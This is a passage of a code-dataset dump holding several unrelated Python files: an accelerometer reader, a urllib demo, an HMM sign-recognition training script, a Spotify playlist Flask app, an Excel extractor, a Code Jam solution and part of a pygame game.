(z_data_2_list[2] << 8)\n\n            x_data_2 = accel_1.read_xyz()[0]\n            y_data_2 = accel_1.read_xyz()[1]\n            z_data_2 = accel_1.read_xyz()[2]\n\n            #Convert two's complement to decimal\n            \n            if(x_data_2 & 0x8000):\n                x_data_2 = ((~x_data_2 & 0xFFFF) + 1)*-1\n            if(y_data_2 & 0x8000): \n                y_data_2 = ((~y_data_2 & 0xFFFF) + 1)*-1\n            if(z_data_2 & 0x8000):\n                z_data_2 = ((~z_data_2 & 0xFFFF) + 1)*-1\n            #Convert to acceleration (D range ±2g)\n            x_data_2 = 2 * 9.8 * x_data_2 / 0x7FFF\n            y_data_2 = 2 * 9.8 * y_data_2 / 0x7FFF\n            z_data_2 = 2 * 9.8 * z_data_2 / 0x7FFF\n\n            csvlist.append([perf_counter(),x_data_2,y_data_2,z_data_2,\"#2\"])\n\n            print(perf_counter(),\"#2\")\n            print('x: {:4.2f}, y: {:4.2f}, z: {:4.2f} [m/s^2]'.format(x_data_2, y_data_2, z_data_2))\n            # time.sleep(0.1)\n\n            \n    except KeyboardInterrupt:\n        writer.writerows(csvlist)\n        f.close()\n        print('!FINISH!')\n        \nif __name__ == \"__main__\":\n    main()\n\n","sub_path":"spi-acc/adxl362spi.py","file_name":"adxl362spi.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"34266480","text":"from urllib import request\nfrom urllib import parse\n\n# request.urlretrieve('http://www.hao123.com','hao123.xml')\n\n# response=request.urlopen('http://www.baidu.com')\nurl = 'http://www.baidu.com/s'\n\nparams = {'name': '呆呆', 'age': 1, 'greetings': 'Hello world'}\n\nqs = parse.urlencode(params)\nqsencode = qs.encode('utf-8')\n\nprint(type(qs))\n\nprint(type(qsencode))\n\nurl = url + \"?\" + qs\n\nresponse = request.urlopen(url)\n\nresult = parse.parse_qs(qs)\n\n# print(response.read())\n","sub_path":"venv/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"527638879","text":"\"\"\"Main file used to prepare training data, train, and test HMMs.\n   HMM EX = python3 main.py --test_type standard --train_iters 25 50 --users Naoki --hmm_insertion_penalty -70\n   SBHMM EX = python3 main.py --test_type standard --users Naoki --train_iters 25 50 --sbhmm_iters 25 50 --train_sbhmm --sbhmm_cycles 1 --no_pca --include_word_level_states --include_word_position --parallel_classifier_training --parallel_jobs 4 --hmm_insertion_penalty -70 --sbhmm_insertion_penalty -115\n\"\"\"\n\"\"\"Main file used to prepare training data, train, and test HMMs.\n   HMM EX = python3 main.py --test_type standard --train_iters 25 50 75 100 --users Prerna Linda | \n   HMM CV = python3 main.py --test_type cross_val --train_iters 25 50 75 100 120 140 160 --users 02-22-20_Prerna_Android 04-29-20_Linda_Android 07-24-20_Matthew_4K --cross_val_method stratified --n_splits 10 --cv_parallel --parallel_jobs 10 --hmm_insertion_penalty -80\n   SBHMM EX = python3 main.py --test_type standard --train_iters 25 50 75 --sbhmm_iters 25 50 75 --users Prerna Linda --train_sbhmm --sbhmm_cycles 1 --no_pca --include_word_level_states --include_word_position --parallel_classifier_training --parallel_jobs 4 --hmm_insertion_penalty -70 --sbhmm_insertion_penalty -115 --neighbors 70\n   SBHMM CV = python3 main.py --test_type cross_val --train_iters 25 50 75 --sbhmm_iters 25 50 75 --users Linda Prerna --train_sbhmm --sbhmm_cycles 1 --no_pca --include_word_level_states --include_word_position --parallel_classifier_training --parallel_jobs 4 --hmm_insertion_penalty -85 --sbhmm_insertion_penalty -85 --neighbors 70 --cross_val_method kfold --n_splits 10 --beam_threshold 2000.0\n   SBHMM EX ADA = python3 main.py --test_type standard --train_iters 25 50 75 --sbhmm_iters 25 50 75 --users 
02-22-20_Prerna_Android --train_sbhmm --sbhmm_cycles 1 --no_pca --include_word_level_states --include_word_position --hmm_insertion_penalty -70 --sbhmm_insertion_penalty -115 --classifier adaboost\n SBHMM CV Parallel = python3 main.py --test_type cross_val --train_iters 25 50 75 100 120 140 160 --sbhmm_iters 25 50 75 100 --users 02-22-20_Prerna_Android 04-29-20_Linda_Android 07-24-20_Matthew_4K --train_sbhmm --sbhmm_cycles 1 --no_pca --include_word_level_states --include_word_position --parallel_classifier_training --hmm_insertion_penalty -80 --sbhmm_insertion_penalty -80 --neighbors 70 --cross_val_method stratified --n_splits 10 --beam_threshold 3000.0 --cv_parallel --parallel_jobs 10\n\"\"\"\nimport sys\nimport glob\nimport argparse\nimport os\nimport shutil\n\nimport numpy as np\nfrom sklearn.model_selection import (\n KFold, StratifiedKFold, LeaveOneGroupOut, train_test_split)\n\nsys.path.insert(0, '../../')\nfrom src.prepare_data import prepare_data\nfrom src.train import create_data_lists, train, trainSBHMM\nfrom src.utils import get_results, save_results, load_json, get_arg_groups\nfrom src.test import test, testSBHMM\nfrom joblib import Parallel, delayed\nfrom statistics import mean\n\ndef copyFiles(fileNames: list, newFolder: str, originalFolder: str, ext: str):\n if os.path.exists(newFolder):\n shutil.rmtree(newFolder)\n os.makedirs(newFolder)\n\n for currFile in fileNames:\n shutil.copyfile(os.path.join(originalFolder, currFile+ext), os.path.join(newFolder, currFile+ext))\n\ndef crossValFold(train_data: list, test_data: list, args: object, fold: int):\n print(f\"Current split = {str(fold)}. Current Test data Size = {len(test_data)}\")\n ogDataFolder = \"data\"\n currDataFolder = os.path.join(\"data\", str(fold))\n trainFiles = [i.split(\"/\")[-1].strip(\".htk\") for i in train_data]\n testFiles = [i.split(\"/\")[-1].strip(\".htk\") for i in test_data]\n allFiles = trainFiles + testFiles\n\n copyFiles(allFiles, os.path.join(currDataFolder, \"ark\"), os.path.join(ogDataFolder, \"ark\"), \".ark\")\n copyFiles(allFiles, os.path.join(currDataFolder, \"htk\"), os.path.join(ogDataFolder, \"htk\"), \".htk\")\n create_data_lists([os.path.join(currDataFolder, \"htk\", i+\".htk\") for i in trainFiles], [\n os.path.join(currDataFolder, \"htk\", i+\".htk\") for i in testFiles], args.phrase_len, fold)\n \n if args.train_sbhmm:\n classifiers = trainSBHMM(args.sbhmm_cycles, args.train_iters, args.mean, args.variance, args.transition_prob, \n args.pca_components, args.sbhmm_iters, args.include_word_level_states, args.include_word_position, args.no_pca, \n args.hmm_insertion_penalty, args.sbhmm_insertion_penalty, args.parallel_jobs, args.parallel_classifier_training,\n args.multiple_classifiers, args.neighbors, args.beam_threshold, args.classifier, os.path.join(str(fold), \"\"))\n testSBHMM(args.start, args.end, args.method, classifiers, args.pca_components, args.no_pca, args.sbhmm_insertion_penalty, \n args.parallel_jobs, args.parallel_classifier_training, os.path.join(str(fold), \"\"))\n else:\n train(args.train_iters, args.mean, args.variance, args.transition_prob, fold=os.path.join(str(fold), \"\"))\n test(args.start, args.end, args.method, args.hmm_insertion_penalty, fold=os.path.join(str(fold), \"\"))\n\n if args.train_sbhmm:\n hresults_file = f'hresults/{os.path.join(str(fold), \"\")}res_hmm{args.sbhmm_iters[-1]-1}.txt'\n else:\n hresults_file = f'hresults/{os.path.join(str(fold), \"\")}res_hmm{args.train_iters[-1]-1}.txt' \n\n results = get_results(hresults_file)\n\n print(f'Current Word 
Error: {results[\"error\"]}')\n print(f'Current Sentence Error: {results[\"sentence_error\"]}')\n\n return [results['error'], results['sentence_error']]\n\n \n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n ############################## ARGUMENTS #####################################\n #Important\n parser.add_argument('--prepare_data', action='store_true')\n parser.add_argument('--save_results', action='store_true')\n\n #Arguments for create_data_lists()\n parser.add_argument('--test_type', type=str, default='test_on_train',\n choices=['test_on_train', 'cross_val', 'standard'])\n parser.add_argument('--users', nargs='*', default=[])\n parser.add_argument('--phrase_len', type=int, default=0)\n parser.add_argument('--random_state', type=int, default=24)\n parser.add_argument('--cross_val_method', required='cross_val' in sys.argv,\n default='kfold', choices=['kfold',\n 'leave_one_phrase_out',\n 'stratified'])\n parser.add_argument('--n_splits', required='cross_val' in sys.argv,\n type=int, default=10)\n parser.add_argument('--cv_parallel', action='store_true')\n parser.add_argument('--test_size', type=float, default=0.1)\n\n #Arguments for save_data()\n parser.add_argument('--save_results_file', type=str,\n default='all_results.json')\n\n #Arguments for training\n parser.add_argument('--train_iters', nargs='*', type=int, default=[20, 50, 80])\n parser.add_argument('--mean', type=float, default=0.0)\n parser.add_argument('--variance', type=float, default=1.0)\n parser.add_argument('--transition_prob', type=float, default=0.6)\n parser.add_argument('--hmm_insertion_penalty', default=-10)\n\n #Arguments for SBHMM\n parser.add_argument('--train_sbhmm', action='store_true') \n parser.add_argument('--sbhmm_cycles', type=int, default=1)\n parser.add_argument('--pca_components', type=int, default=50)\n parser.add_argument('--no_pca', action='store_true')\n parser.add_argument('--sbhmm_iters', nargs='*', type=int, default=[20, 50, 80])\n parser.add_argument('--include_word_level_states', action='store_true')\n parser.add_argument('--include_word_position', action='store_true')\n parser.add_argument('--parallel_classifier_training', action='store_true')\n parser.add_argument('--parallel_jobs', default=4, type=int)\n parser.add_argument('--sbhmm_insertion_penalty', default=-10)\n parser.add_argument('--neighbors', default=50)\n parser.add_argument('--multiple_classifiers', action='store_true')\n parser.add_argument('--classifier', type=str, default='knn',\n choices=['knn', 'adaboost'])\n parser.add_argument('--beam_threshold', default=3000.0)\n\n #Arguments for testing\n parser.add_argument('--start', type=int, default=-2)\n parser.add_argument('--end', type=int, default=-1)\n parser.add_argument('--method', default='recognition')\n \n args = parser.parse_args()\n ########################################################################################\n\n cross_val_methods = {'kfold': (KFold, False),\n 'leave_one_phrase_out': (LeaveOneGroupOut, True),\n 'stratified': (StratifiedKFold, True)}\n cross_val_method, use_groups = cross_val_methods[args.cross_val_method]\n\n features_config = load_json('configs/features.json')\n all_results = {'features': features_config['selected_features'],\n 'average': {}}\n \n if args.train_sbhmm:\n hresults_file = f'hresults/res_hmm{args.sbhmm_iters[-1]-1}.txt'\n else:\n hresults_file = f'hresults/res_hmm{args.train_iters[-1]-1}.txt'\n\n\n if args.prepare_data:\n\n prepare_data(features_config)\n\n if args.test_type == 'test_on_train':\n \n if 
len(args.users) == 0:\n htk_filepaths = glob.glob('data/htk/*htk')\n else:\n htk_filepaths = []\n for user in args.users:\n htk_filepaths.extend(glob.glob(os.path.join(\"data/htk\", '*{}*.htk'.format(user))))\n\n create_data_lists(htk_filepaths, htk_filepaths, args.phrase_len)\n \n if args.train_sbhmm:\n classifiers = trainSBHMM(args.sbhmm_cycles, args.train_iters, args.mean, args.variance, args.transition_prob, \n args.pca_components, args.sbhmm_iters, args.include_word_level_states, args.include_word_position, args.no_pca, \n args.hmm_insertion_penalty, args.sbhmm_insertion_penalty, args.parallel_jobs, args.parallel_classifier_training,\n args.multiple_classifiers, args.neighbors, args.classifier, args.beam_threshold)\n testSBHMM(args.start, args.end, args.method, classifiers, args.pca_components, args.no_pca, args.sbhmm_insertion_penalty,\n args.parallel_jobs, args.parallel_classifier_training)\n else:\n train(args.train_iters, args.mean, args.variance, args.transition_prob)\n test(args.start, args.end, args.method, args.hmm_insertion_penalty)\n \n if args.method == \"recognition\":\n all_results['fold_0'] = get_results(hresults_file)\n all_results['average']['error'] = all_results['fold_0']['error']\n all_results['average']['sentence_error'] = all_results['fold_0']['sentence_error']\n\n print('Test on Train Results')\n \n elif args.test_type == 'cross_val' and args.cv_parallel:\n print(\"You have invoked parallel cross validation. Be prepared for dancing progress bars!\")\n\n if len(args.users) == 0:\n htk_filepaths = glob.glob('data/htk/*htk')\n else:\n htk_filepaths = []\n for user in args.users:\n htk_filepaths.extend(glob.glob(os.path.join(\"data/htk\", '*{}*.htk'.format(user))))\n\n phrases = [filepath.split('/')[-1].split(\".\")[0] + \" \" + ' '.join(filepath.split('/')[-1].split(\".\")[1].split(\"_\"))\n for filepath\n in htk_filepaths]\n \n unique_phrases = set(phrases)\n group_map = {phrase: i for i, phrase in enumerate(unique_phrases)}\n groups = [group_map[phrase] for phrase in phrases]\n cross_val = cross_val_method(n_splits=args.n_splits)\n\n if use_groups:\n splits = list(cross_val.split(htk_filepaths, phrases, groups))\n else:\n splits = list(cross_val.split(htk_filepaths, phrases))\n \n stats = Parallel(n_jobs=args.parallel_jobs)(delayed(crossValFold)(np.array(htk_filepaths)[splits[currFold][0]], np.array(htk_filepaths)[splits[currFold][1]], args, currFold) for currFold in range(len(splits)))\n \n all_results['average']['error'] = mean([i[0] for i in stats])\n all_results['average']['sentence_error'] = mean([i[1] for i in stats])\n\n elif args.test_type == 'cross_val':\n\n\n word_counts = []\n phrase_counts = []\n substitutions = 0\n deletions = 0\n insertions = 0\n sentence_errors = 0\n\n if len(args.users) == 0:\n htk_filepaths = glob.glob('data/htk/*htk')\n else:\n htk_filepaths = []\n for user in args.users:\n htk_filepaths.extend(glob.glob(os.path.join(\"data/htk\", '*{}*.htk'.format(user))))\n\n phrases = [' '.join(filepath.split('.')[1].split(\"_\"))\n for filepath\n in htk_filepaths]\n \n unique_phrases = set(phrases)\n group_map = {phrase: i for i, phrase in enumerate(unique_phrases)}\n groups = [group_map[phrase] for phrase in phrases]\n cross_val = cross_val_method(n_splits=args.n_splits)\n\n if use_groups:\n splits = list(cross_val.split(htk_filepaths, phrases, groups))\n else:\n splits = list(cross_val.split(htk_filepaths, phrases))\n\n for i, (train_index, test_index) in enumerate(splits):\n\n print(f'Current split = {i}')\n \n train_data = 
np.array(htk_filepaths)[train_index]\n test_data = np.array(htk_filepaths)[test_index]\n\n phrase = np.array(phrases)[test_index][0]\n phrase_len = len(phrase.split(' '))\n phrase_count = len(test_data)\n word_count = phrase_len * phrase_count\n word_counts.append(word_count)\n phrase_counts.append(phrase_count)\n create_data_lists(train_data, test_data, args.phrase_len)\n\n if args.train_sbhmm:\n classifiers = trainSBHMM(args.sbhmm_cycles, args.train_iters, args.mean, args.variance, args.transition_prob, \n args.pca_components, args.sbhmm_iters, args.include_word_level_states, args.include_word_position, args.no_pca, \n args.hmm_insertion_penalty, args.sbhmm_insertion_penalty, args.parallel_jobs, args.parallel_classifier_training,\n args.multiple_classifiers, args.neighbors, args.classifier, args.beam_threshold)\n testSBHMM(args.start, args.end, args.method, classifiers, args.pca_components, args.no_pca, args.sbhmm_insertion_penalty, \n args.parallel_jobs, args.parallel_classifier_training)\n else:\n train(args.train_iters, args.mean, args.variance, args.transition_prob)\n test(args.start, args.end, args.method, args.hmm_insertion_penalty)\n \n results = get_results(hresults_file)\n all_results[f'fold_{i}'] = results\n all_results[f'fold_{i}']['phrase'] = phrase\n all_results[f'fold_{i}']['phrase_count'] = phrase_count\n\n print(f'Current Word Error: {results[\"error\"]}')\n print(f'Current Sentence Error: {results[\"sentence_error\"]}')\n\n substitutions += (word_count * results['substitutions'] / 100)\n deletions += (word_count * results['deletions'] / 100)\n insertions += (word_count * results['insertions'] / 100)\n sentence_errors += (phrase_count * results['sentence_error'] / 100)\n\n total_words = sum(word_counts)\n total_phrases = sum(phrase_counts)\n total_errors = substitutions + deletions + insertions\n mean_error = (total_errors / total_words) * 100\n mean_error = np.round(mean_error, 4)\n mean_sentence_error = (sentence_errors / total_phrases) * 100\n mean_sentence_error = np.round(mean_sentence_error, 2)\n\n all_results['average']['error'] = mean_error\n all_results['average']['sentence_error'] = mean_sentence_error\n\n print('Cross-Validation Results')\n\n elif args.test_type == 'standard':\n\n if len(args.users) == 0:\n htk_filepaths = glob.glob('data/htk/*htk')\n else:\n htk_filepaths = []\n for user in args.users:\n htk_filepaths.extend(glob.glob(os.path.join(\"data/htk\", '*{}*.htk'.format(user))))\n \n phrases = [' '.join(filepath.split('.')[1].split('_'))\n for filepath\n in htk_filepaths]\n #unique_phrases = set(phrases)\n #group_map = {phrase: i for i, phrase in enumerate(unique_phrases)}\n #groups = [group_map[phrase] for phrase in phrases]\n train_data, test_data, _, _ = train_test_split(\n htk_filepaths, phrases, test_size=args.test_size,\n random_state=args.random_state)\n\n create_data_lists(train_data, test_data, args.phrase_len)\n if args.train_sbhmm:\n classifiers = trainSBHMM(args.sbhmm_cycles, args.train_iters, args.mean, args.variance, args.transition_prob, \n args.pca_components, args.sbhmm_iters, args.include_word_level_states, args.include_word_position, args.no_pca, \n args.hmm_insertion_penalty, args.sbhmm_insertion_penalty, args.parallel_jobs, args.parallel_classifier_training,\n args.multiple_classifiers, args.neighbors, args.classifier, args.beam_threshold)\n testSBHMM(args.start, args.end, args.method, classifiers, args.pca_components, args.no_pca, args.sbhmm_insertion_penalty, \n args.parallel_jobs, args.parallel_classifier_training)\n else:\n 
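# plain HMM pipeline: train once on the split, then decode with the insertion penalty\n            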
train(args.train_iters, args.mean, args.variance, args.transition_prob)\n            test(args.start, args.end, args.method, args.hmm_insertion_penalty)\n\n        if args.method == \"recognition\":\n            all_results['fold_0'] = get_results(hresults_file)\n            all_results['average']['error'] = all_results['fold_0']['error']\n            all_results['average']['sentence_error'] = all_results['fold_0']['sentence_error']\n\n        print('Standard Train/Test Split Results')\n\n    if args.method == \"recognition\":\n        \n        print(f'Average Error: {all_results[\"average\"][\"error\"]}')\n        print(f'Average Sentence Error: {all_results[\"average\"][\"sentence_error\"]}')\n\n    # print(all_results)\n    # Loads data as new run into pickle\n    if args.save_results:\n        save_results(all_results, args.save_results_file)","sub_path":"SequentialClassification/main/projects/silentSpellerSBHMMJuly/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"125549332","text":"import sys\n\n\ndef cat2(filenames):\n    result = \"\"\n    for i in range(len(filenames)):\n        readFile = open(filenames[i], \"r\")\n        result += readFile.read()\n        if i != len(filenames) - 1:\n            result += '\\n'\n        readFile.close()\n    return result\n\n\ndef main():\n    filenames = []\n    for i in range(1, len(sys.argv)):\n        filenames.append(sys.argv[i])\n    print(cat2(filenames))\n\n\nif __name__ == '__main__':\n    main()","sub_path":"week0_file_problem/cat2.py","file_name":"cat2.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"346203213","text":"from flask import (Flask, render_template, request, flash, session,\n                   redirect, jsonify, make_response)\n\nimport os\nfrom model import connect_to_db, SavedPlaylist\nimport crud\n\nimport urllib\nimport logging\nimport time\n\nSECRET_KEY = os.environ['SECRET_KEY']\nSPOTIFY_CLIENT_ID = os.environ['SPOTIFY_CLIENT_ID']\nSPOTIFY_SECRET = os.environ['SPOTIFY_SECRET']\n\napp = Flask(__name__)\napp.secret_key = SECRET_KEY\n\n@app.route('/')\ndef index():\n    \"\"\"Render Home Page\"\"\"\n    return render_template('index.html')\n\n@app.route('/authorize')\ndef authorize():\n    \"\"\"Redirect to Spotify OAuth to authenticate a user.\"\"\"\n    scopes = 'playlist-modify-public playlist-modify-private playlist-read-private playlist-read-collaborative user-read-email user-read-private'\n\n    spotify_authorize_url = 'https://accounts.spotify.com/authorize?'\n    params = {\n        'response_type': 'code', \n        'client_id': SPOTIFY_CLIENT_ID,\n        'redirect_uri': 'http://0.0.0.0:5000/callback',\n        'scope': scopes, \n        'show_dialog': True\n    }\n\n    query_params = urllib.parse.urlencode(params)\n    response = make_response(redirect(spotify_authorize_url + query_params))\n    return response\n\n@app.route('/callback')\ndef authorize_callback():\n    \"\"\"Get user token.\"\"\"\n\n    code = request.args.get('code')\n    \n    payload = crud.getToken(code)\n    if payload:\n        session['token'] = payload[0]\n        session['refresh_token'] = payload[1]\n        session['token_expiration'] = time.time() + payload[2]\n    else:\n        #error\n        print('Token access failed')\n\n    userInfo = crud.getUserInfo(session)\n    spotify_id = userInfo['id']\n    user = crud.getUserFromDB(spotify_id)\n\n    if not user:\n        user = crud.createUser(spotify_id, session)\n    \n    session['user_id'] = user.user_id\n    logging.info('new user:' + str(session['user_id']))\n    print(session['user_id'])\n\n    return redirect('/')\n\n\n@app.route('/logout')\ndef logout():\n    \"\"\"Disconnect 
user from Spotify.\"\"\"\n\n session.clear()\n crud.logout()\n \n return \"Logout Success\"\n\n\n@app.route('/user')\ndef getUser():\n \"\"\"Check if a user is authenticated.\"\"\"\n\n if 'token' in session:\n return \"Authenticated\"\n else:\n return \"Unauthenticated\"\n\n\n@app.route('/playlists')\ndef getPlaylists(): \n \"\"\"Get a list of a user's playlists.\"\"\"\n\n allPlaylistData = []\n\n spotifyPlaylistData = crud.getPlaylists(session)\n if 'items' in spotifyPlaylistData:\n allPlaylistData = spotifyPlaylistData['items']\n \n savedPlaylistIDs = crud.getSavedPlaylistIDsByUser(int(session['user_id']))\n\n regPlaylistData = [i for i in allPlaylistData if i['id'] not in savedPlaylistIDs]\n savedPlaylistData = [i for i in allPlaylistData if i['id'] in savedPlaylistIDs]\n\n data = {\n 'regPlaylistData': regPlaylistData,\n 'savedPlaylistData': savedPlaylistData\n }\n \n return data\n\n\n@app.route('/tracks/<playlist_id>')\ndef getTracks(playlist_id):\n \"\"\"Get the tracks in a playlist.\"\"\"\n\n tracks = crud.getTracks(session, playlist_id)\n\n return tracks\n\n\n@app.route('/save', methods=['POST'])\ndef savePlaylist():\n \"\"\"Save a playlist as a new playlist and update.\"\"\"\n\n # get user form info\n title = request.json.get('title')\n interval = request.json.get('interval')\n orig_playlist_id = request.json.get('playlist_id')\n\n # create a new playlist\n new_playlist = crud.createPlaylist(session, title)\n\n new_playlist_id = new_playlist['id']\n\n user_id = session['user_id']\n\n # store playlist in DB\n savedPlaylist = crud.storeSavedPlaylist(user_id, orig_playlist_id, \n new_playlist_id, interval, title)\n print(savedPlaylist)\n \n # copy over tracks in original playlist to the new playlist\n snapshot_id = crud.updatePlaylist(session, orig_playlist_id, new_playlist_id)\n\n return snapshot_id\n\n\n@app.route('/update', methods=['POST'])\ndef updatePlaylist():\n \"\"\"Update a saved playlist.\"\"\"\n\n orig_playlist_id = request.json.get('orig_playlist_id')\n new_playlist_id = request.json.get('new_playlist_id')\n snapshot_id = crud.updatePlaylist(session, orig_playlist_id, new_playlist_id)\n\n return snapshot_id\n\n\n@app.cli.command()\ndef scheduled():\n \"\"\"Test scheduled task.\"\"\"\n connect_to_db(app)\n print(crud.getSavedPlaylistsAndUsers(\"weekly\"))\n \n h = {}\n\n for i in crud.getSavedPlaylistsAndUsers(\"weekly\"):\n h['token'] = i[0]\n h['refresh_token'] = i[1]\n h['token_expiration'] = float(i[2])\n\n orig_playlist_id = i[3]\n saved_playlist_id = i[4]\n\n crud.updatePlaylist(h, orig_playlist_id, saved_playlist_id)\n\n print('Running test')\n\n\n\n\nif __name__ == '__main__':\n connect_to_db(app)\n app.run(host='0.0.0.0', debug=True)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"456072952","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os.path\nimport pandas as pd\n\nclass ExcelExtractor(object):\n\n\tdef __init__(self):\n\t\tpass\n\n\tdef __readExcel2003(self, filepath, targetSheetIndex = None, \\\n\t\ttargetSheetName = None, headerRows = 1):\n\t\timport xlrd\n\n\t\ttable = []\n\t\twb = xlrd.open_workbook(filepath)\n\n\t\t# get worksheet\n\t\tws = None\n\t\tif not targetSheetName is None:\n\t\t\tws = wb.sheet_by_name(targetSheetName)\n\t\telse:\n\t\t\tif not targetSheetIndex is None:\n\t\t\t\tws = wb.sheet_by_index(targetSheetIndex)\n\t\t\telse:\n\t\t\t\traise ValueError(\"The targetSheet arguments 
must be specified one: targetSheetIndex=%s, targetSheetName=%s\" % (targetSheetIndex, targetSheetName))\n\n\t\t# get cell data\n\t\tfor rowIndex in range(0, ws.nrows):\n\t\t\trow = ws.row(rowIndex)\n\t\t\trowdata = []\n\t\t\tfor colIndex in range(0, ws.ncols):\n\t\t\t\tcell = row[colIndex]\n\t\t\t\tcellval = cell.value\n\t\t\t\trowdata.append(cellval)\n\t\t\ttable.append(rowdata)\n\t\treturn pd.DataFrame(data = table[headerRows:], columns = table[:headerRows][0])\n\n\tdef __readExcel2007(self, filepath, targetSheetIndex = None, targetSheetName = None, headerRows = 1):\n\t\t# Minimal openpyxl-based reader mirroring __readExcel2003; the original was an empty stub that broke when extract() passed headerRows. Assumes openpyxl is installed.\n\t\tfrom openpyxl import load_workbook\n\n\t\twb = load_workbook(filepath, read_only = True, data_only = True)\n\t\tif targetSheetName is None and targetSheetIndex is None:\n\t\t\traise ValueError(\"The targetSheet arguments must be specified one: targetSheetIndex=%s, targetSheetName=%s\" % (targetSheetIndex, targetSheetName))\n\t\tws = wb[targetSheetName] if not targetSheetName is None else wb.worksheets[targetSheetIndex]\n\t\ttable = [[cell.value for cell in row] for row in ws.iter_rows()]\n\t\treturn pd.DataFrame(data = table[headerRows:], columns = table[:headerRows][0])\n\n\tdef extract(self, filepath, targetSheetIndex = None, targetSheetName = None, headerRows = 1):\n\t\t\"\"\"\n\t\tExtract data from the excel file.\n\n\t\tArgs:\n\t\t\tfilepath: the path of target file.\n\t\t\ttargetSheetIndex: default None. the index of target sheet.\n\t\t\ttargetSheetName: default None. the name of target sheet.\n\t\t\theaderRows: default 1. the rows count of header.\n\n\t\tReturns:\n\t\t\treturn the pandas.DataFrame of rows.\n\n\t\tRaises:\n\t\t\tNone\n\t\t\"\"\"\n\n\t\tif(not os.path.exists(filepath)):\n\t\t\traise FileNotFoundError(filepath)\n\n\t\tdf = None\n\t\textName = filepath.split(\".\")[-1]\n\t\tif extName == \"xls\":\n\t\t\tdf = self.__readExcel2003(filepath = filepath, targetSheetIndex = targetSheetIndex, \\\n\t\t\ttargetSheetName = targetSheetName, headerRows = headerRows)\n\t\telif extName == \"xlsx\":\n\t\t\tdf = self.__readExcel2007(filepath = filepath, targetSheetIndex = targetSheetIndex, \\\n\t\t\ttargetSheetName = targetSheetName, headerRows = headerRows)\n\t\telse:\n\t\t\traise ValueError(\"Unsupported file type: %s\" % extName)\n\t\treturn df\n\nif __name__ == \"__main__\":\n\tfilepath = os.path.abspath(r\"../../test/read_test/data/test.xls\")\n\ter = ExcelExtractor()\n\tprint(er.extract.__doc__)\n\tdf = er.extract(filepath=filepath, targetSheetIndex = 0)\n\tprint(df)\n","sub_path":"src/extractors/ExcelExtractor.py","file_name":"ExcelExtractor.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"325949091","text":"T=int(input())\r\nfor case_id in range(1,T+1):\r\n    S=input()\r\n    def solve():\r\n        res = S[0]\r\n        for i in range(1,len(S)):\r\n            if ord(S[i]) >= ord(res[0]):\r\n                res = S[i]+res\r\n            else:\r\n                res = res+S[i]\r\n        return res\r\n\r\n    ans = solve()\r\n    print('Case #%d: %s' % (case_id, ans))\r\n    import sys\r\n    print('Case #%d: %s' % (case_id, ans), file=sys.stderr)\r\n","sub_path":"codes/BuildLinks1.10/test_input/CJ_16_1/16_1_1_Pred4c3_A.py","file_name":"16_1_1_Pred4c3_A.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"335586786","text":"from main import *\nimport pygame\nimport random\n\nlista_tazas = []\nlista_obstaculos = []\n\nROJO = (255, 0, 0)\n\n# Function to move the cups along the x axis\ndef mover_taza(lista_tazas, ciclos, pantalla):\n\n\tif len(lista_tazas) > 0:\n\t\tfor i in range(len(lista_tazas)):\n\t\t\tif ciclos == 1:\n\t\t\t\tif(lista_tazas[i][0] > 32):\n\t\t\t\t\tlista_tazas[i][0] -= 1\n\t\t\tif ciclos == 0:\n\t\t\t\tif(lista_tazas[i][0] < pantalla.get_width() - 32):\n\t\t\t\t\tlista_tazas[i][0] += 1\n\t\t\t\tif(lista_tazas[i][0] >= pantalla.get_width() - 32):\n\t\t\t\t\tlista_tazas[i][0] = 0\n\n\n# Function to move the cups down toward the player\ndef mover_taza_y(lista_tazas):\n\tif len(lista_tazas) > 0:\n\t\tfor i in 
range(len(lista_tazas)):\n\t\t\tlista_tazas[i][1] += 3\n\n# Checks for collisions between the projectiles and the cups\ndef Colisiones(lista_tazas, lista_proyectil, ancho_imagen):\n\n\tborro = False\n\n\tif len(lista_tazas) != 0 and len(lista_proyectil) != 0:\n\t\tfor i in range (len(lista_tazas)):\n\t\t\ts = 0\n\t\t\twhile s < ancho_imagen and not borro:\n\t\t\t\tfor j in range (len(lista_proyectil)):\n\t\t\t\t\tif lista_tazas[i][0] + s == lista_proyectil[j][0] and lista_proyectil[j][1] <= lista_tazas[i][1] :\n\t\t\t\t\t\tdel lista_tazas[i]\n\t\t\t\t\t\tdel lista_proyectil[j]\n\t\t\t\t\t\tborro = True\n\t\t\t\t\t\tbreak\n\t\t\t\t\ts = s + 0.25\n\n# Sets the x,y positions of the cups\ndef iniciar_tazas(cant_taza):\n\ts = 0\n\tcont = 0\n\ty = 25\n\tfor i in range(cant_taza):\n\t\ttaza_x = s * 40 + 35\n\t\ttaza_y = y\n\t\tif cont == 18:\n\t\t\ts = 0\n\t\t\tcont = 0\n\t\t\ty += 35\n\t\tif cont!= 0:\n\t\t\ts += 1\n\t\tcont += 1\n\t\tlista_tazas.append([taza_x, taza_y])\n\n# Resets the list of cups\ndef reset_tazas(lista_tazas):\n\ts = 0\n\tcont = 0\n\ty = 25\n\n\tif(len(lista_tazas)!=73):\n\t# Fills out the list of cups\n\t\tfor i in range(73 - len(lista_tazas)):\n\t\t\tlista_tazas.append([0, 0])\n\n\t# Positions the cups\n\tfor i in range(73):\n\t\ttaza_x = s * 40 + 35\n\t\ttaza_y = y\n\t\tif cont == 18:\n\t\t\ts = 0\n\t\t\tcont = 